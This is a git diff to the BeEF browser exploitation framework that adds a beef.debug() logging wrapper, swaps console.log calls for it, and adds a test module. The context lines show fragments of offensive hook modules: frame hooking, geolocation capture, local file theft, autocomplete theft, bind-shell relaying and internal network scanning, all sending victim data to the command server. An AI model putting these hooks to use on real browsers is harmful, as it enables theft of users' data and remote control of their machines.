diff --git a/core/main/client/beef.js b/core/main/client/beef.js index 1bbcc01c9..14f39e2a0 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js @@ -31,7 +31,20 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { // An array containing all the BeEF JS components. components: new Array(), - + + /** + * Adds a function to display debug messages (wraps console.log()) + * @param: {string} the debug string to return + */ + debug: function(msg) { + if (typeof console == "object" && typeof console.log == "function") { + console.log(msg); + } else { + // TODO: maybe add a callback to BeEF server for debugging purposes + //window.alert(msg); + } + }, + /** * Adds a function to execute. * @param: {Function} the function to execute. diff --git a/core/main/client/browser.js b/core/main/client/browser.js index edded787e..ed83764ca 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -871,10 +871,10 @@ beef.browser = { try { // append hook script self.frames[i].document.body.appendChild(script); - //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); + //beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); } catch (e) { // warn on cross-domain - //console.log("Hooking frame failed"); + //beef.debug("Hooking frame failed"); } } }, diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js index aa50adaed..3347bdbc2 100644 --- a/core/main/client/geolocation.js +++ b/core/main/client/geolocation.js @@ -32,14 +32,14 @@ beef.geolocation = { $j.ajax({ error: function(xhr, status, error){ - //console.log("[geolocation.js] openstreetmap error"); + //beef.debug("[geolocation.js] openstreetmap error"); beef.net.send(command_url, command_id, "latitude=" + latitude + "&longitude=" + longitude + "&osm=UNAVAILABLE" + "&geoLocEnabled=True"); }, success: function(data, status, xhr){ - //console.log("[geolocation.js] openstreetmap success"); + //beef.debug("[geolocation.js] openstreetmap success"); var jsonResp = $j.parseJSON(data); beef.net.send(command_url, command_id, "latitude=" + latitude @@ -64,16 +64,16 @@ beef.geolocation = { beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); return; } - //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition"); + //beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition"); navigator.geolocation.getCurrentPosition( //note: this is an async call function(position){ // success var latitude = position.coords.latitude; var longitude = position.coords.longitude; - //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); + //beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude); }, function(error){ // failure - //console.log("[geolocation.js] error [%d] getting position", error.code); + //beef.debug("[geolocation.js] error [%d] getting position", error.code); switch(error.code) // Returns 0-3 { case 0: diff --git a/core/main/client/init.js b/core/main/client/init.js index b18fd262a..1a7780798 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js @@ -32,7 +32,7 @@ window.onpopstate = function (event) { try { callback(event); } catch (e) { - console.log("window.onpopstate - couldn't execute callback: " + e.message); + beef.debug("window.onpopstate - couldn't execute callback: " + e.message); } return false; } @@ -47,7 +47,7 @@ window.onclose = function (event) { try { callback(event); } catch (e) { - console.log("window.onclose - couldn't execute callback: " + e.message); + beef.debug("window.onclose - couldn't execute callback: " + e.message); } return false; } diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js index 3da10bf36..7955198c2 100644 --- a/core/main/client/net/dns.js +++ b/core/main/client/net/dns.js @@ -43,7 +43,7 @@ beef.net.dns = { // sends a DNS request sendQuery = function(query) { - //console.log("Requesting: "+query); + //beef.debug("Requesting: "+query); var img = new Image; img.src = "http://"+query; img.onload = function() { dom.removeChild(this); } diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js index d6914fe00..85e4eb722 100644 --- a/core/main/client/net/xssrays.js +++ b/core/main/client/net/xssrays.js @@ -105,7 +105,7 @@ beef.net.xssrays = { // util function. Print string to the console only if the debug flag is on and the browser is not IE. printDebug:function(log) { if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) { - console.log("[XssRays] " + log); + beef.debug("[XssRays] " + log); } }, diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js index bbc7c5f36..1b95fbc97 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js @@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) { id = data.id; }, error: function(){ - console.log("Error getting module id."); + beef.debug("Error getting module id."); } }); return id; @@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) { async: false, processData: false, success: function(data){ - console.log("data: " + data.command_id); + beef.debug("data: " + data.command_id); result = "Command [" + data.command_id + "] sent successfully"; }, error: function(){ - console.log("Error sending command"); + beef.debug("Error sending command"); return "Error sending command"; } }); @@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) { processData: false, success: function(data){ $jwterm.each(data, function(i){ - console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); + beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); results += $jwterm.parseJSON(data[i].data).data; }); }, error: function(){ - console.log("Error sending command"); + beef.debug("Error sending command"); return "Error sending command"; } }); diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js new file mode 100644 index 000000000..4737ae211 --- /dev/null +++ b/modules/debug/test_beef_debug/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + try { + var msg = "<%= @msg.gsub(/"/, '\\"') %>"; + beef.debug(msg); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.'); + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message); + } + +}); diff --git a/modules/debug/test_beef_debug/config.yaml b/modules/debug/test_beef_debug/config.yaml new file mode 100644 index 000000000..f077e3b4f --- /dev/null +++ b/modules/debug/test_beef_debug/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + test_beef_debug: + enable: true + category: "Debug" + name: "Test beef.debug()" + description: "Test the 'beef.debug()' function. This function wraps 'console.log()'" + authors: ["bcoles"] + target: + working: ["All"] + not_working: ["IE"] diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb new file mode 100644 index 000000000..239272875 --- /dev/null +++ b/modules/debug/test_beef_debug/module.rb @@ -0,0 +1,20 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Test_beef_debug < BeEF::Core::Command + + def self.options + return [ + {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' } + ] + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end + +end diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js index dbd0df5ca..da6d040f0 100755 --- a/modules/exploits/beefbind/beef_bind_shell/command.js +++ b/modules/exploits/beefbind/beef_bind_shell/command.js @@ -31,15 +31,15 @@ beef.execute(function () { xhr.onreadystatechange = function(){ if(xhr.readyState == 4){ var result = strip_output(xhr.responseText); - console.log("result.length: " + result.length); + beef.debug("result.length: " + result.length); if(result.length != 0){ - console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); + beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); beef.net.send("<%= @command_url %>", <%= @command_id %>, result); counter++; setTimeout("get_additional_cmd_results()",500); } }else{ // No more command results, ready to send another command. - console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); + beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); } }; xhr.open("GET", uri, false); @@ -51,9 +51,9 @@ beef.execute(function () { xhr = new XMLHttpRequest(); xhr.onreadystatechange = function(){ if(xhr.readyState == 4){ - console.log("get_prompt: Retrieved prompt"); + beef.debug("get_prompt: Retrieved prompt"); var prompt = strip_output(xhr.responseText); - console.log(prompt); + beef.debug(prompt); beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); //send command @@ -68,7 +68,7 @@ beef.execute(function () { xhr = new XMLHttpRequest(); xhr.onreadystatechange = function(){ var cmd_result = strip_output(xhr.responseText); - console.log(cmd_result); + beef.debug(cmd_result); beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); }; xhr.open("POST", uri, false); diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js index c0f65089b..dff727eb9 100755 --- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js @@ -295,7 +295,7 @@ beef.execute(function () { // this is required only with WebKit browsers. if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { - console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; @@ -310,7 +310,7 @@ beef.execute(function () { log("send_stager: stager sent."); stager_successfull = true; }catch(exception){ - console.log("!!! Exception: " + exception); + beef.debug("!!! Exception: " + exception); // Check for PortBanning exceptions: //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ @@ -335,13 +335,13 @@ beef.execute(function () { var uri = "http://" + rhost + ":" + rport + path; xhr = new XMLHttpRequest(); - console.log("uri: " + uri); + beef.debug("uri: " + uri); xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); // this is required only with WebKit browsers. if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { - console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; @@ -362,7 +362,7 @@ beef.execute(function () { log = function(data){ beef.net.send("<%= @command_url %>", <%= @command_id %>, data); - console.log(data); + beef.debug(data); }; diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 1cff957ef..d0cd40942 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js @@ -219,9 +219,9 @@ result = ''; function grabFiles(dir,os){ tmpfile = {} for (i in fileList[os]['post']){ - console.log('dir = ' + dir); - console.log('fileList: ' + fileList[os]['post'][i]); - console.log(i); + beef.debug('dir = ' + dir); + beef.debug('fileList: ' + fileList[os]['post'][i]); + beef.debug(i); tmpfile[i] = new XMLHttpRequest() tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); tmpfile[i].send(); @@ -229,7 +229,7 @@ result = ''; tmpfile[i].onreadystatechange=function(){ for (j in fileList[os]['post']){ if(tmpfile[j].readyState==4){ - console.log('new returned for: ' + j); + beef.debug('new returned for: ' + j); result = j +": "+ tmpfile[j].responseText; beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 620defb23..476041a55 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -219,7 +219,7 @@ beef.execute(function() { for(var u=0; u < urls.length; u++) { if(!urls[u][3] && ports != null){ // use default port var img = new Image; - //console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); + //beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); img.id = u; img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4]; img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } @@ -227,7 +227,7 @@ beef.execute(function() { } else { // iterate to all the specified ports for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js index c34389780..99f0ef075 100644 --- a/modules/phonegap/phonegap_geo_locate/command.js +++ b/modules/phonegap/phonegap_geo_locate/command.js @@ -27,7 +27,7 @@ beef.execute(function() { // onError Callback receives a PositionError object // function onError(error) { - console.log('code: ' + error.code + '\n' + + beef.debug('code: ' + error.code + '\n' + 'message: ' + error.message + '\n'); } diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js index df520a17d..d15797a72 100644 --- a/modules/phonegap/phonegap_persistence/command.js +++ b/modules/phonegap/phonegap_persistence/command.js @@ -26,12 +26,12 @@ beef.execute(function() { function write_file(text) { function fail () { - console.log('write_file fail') + beef.debug('write_file fail') } function gotFileWriter(writer) { writer.onwrite = function(evt) { - console.log("write success"); + beef.debug("write success"); } writer.write(text); } @@ -59,14 +59,14 @@ beef.execute(function() { function read_index(app_name) { function fail () { - console.log('read_index fail') + beef.debug('read_index fail') } function readFile(file) { var reader = new FileReader(); reader.onloadend = function(evt) { - //console.log("Read as text"); - console.log(evt.target.result); + //beef.debug("Read as text"); + beef.debug(evt.target.result); replace_text(evt.target.result); }; reader.readAsText(file); @@ -86,14 +86,14 @@ beef.execute(function() { function locate() { function result(entries) { - console.log('result'); + beef.debug('result'); var i; for (i=0; i.app var re = new RegExp(/^[a-zA-Z0-9]*\.app/) var match = re.exec(entries[i].name) if (match) { - console.log('found ' + entries[i].name); + beef.debug('found ' + entries[i].name); // look for ../.app/www/index.html read_index(entries[i].name); @@ -107,11 +107,11 @@ beef.execute(function() { function fail() { - console.log('fail'); + beef.debug('fail'); } function win(entries) { - console.log('win'); + beef.debug('win'); result(entries); } diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js index ffcb1677c..d8b9ae639 100644 --- a/modules/social_engineering/autocomplete_theft/command.js +++ b/modules/social_engineering/autocomplete_theft/command.js @@ -44,7 +44,7 @@ beef.execute(function() { var val = JSON.stringify({'input':n,'value':v}); if (v != "" && !inArray(val,results)){ results.push(val); - //console.log(val); + //beef.debug(val); beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val); } } diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js index 7d1878e32..1e635fbbc 100755 --- a/modules/social_engineering/clippy/command.js +++ b/modules/social_engineering/clippy/command.js @@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) { } - console.log(ref); + beef.debug(ref); return ref; }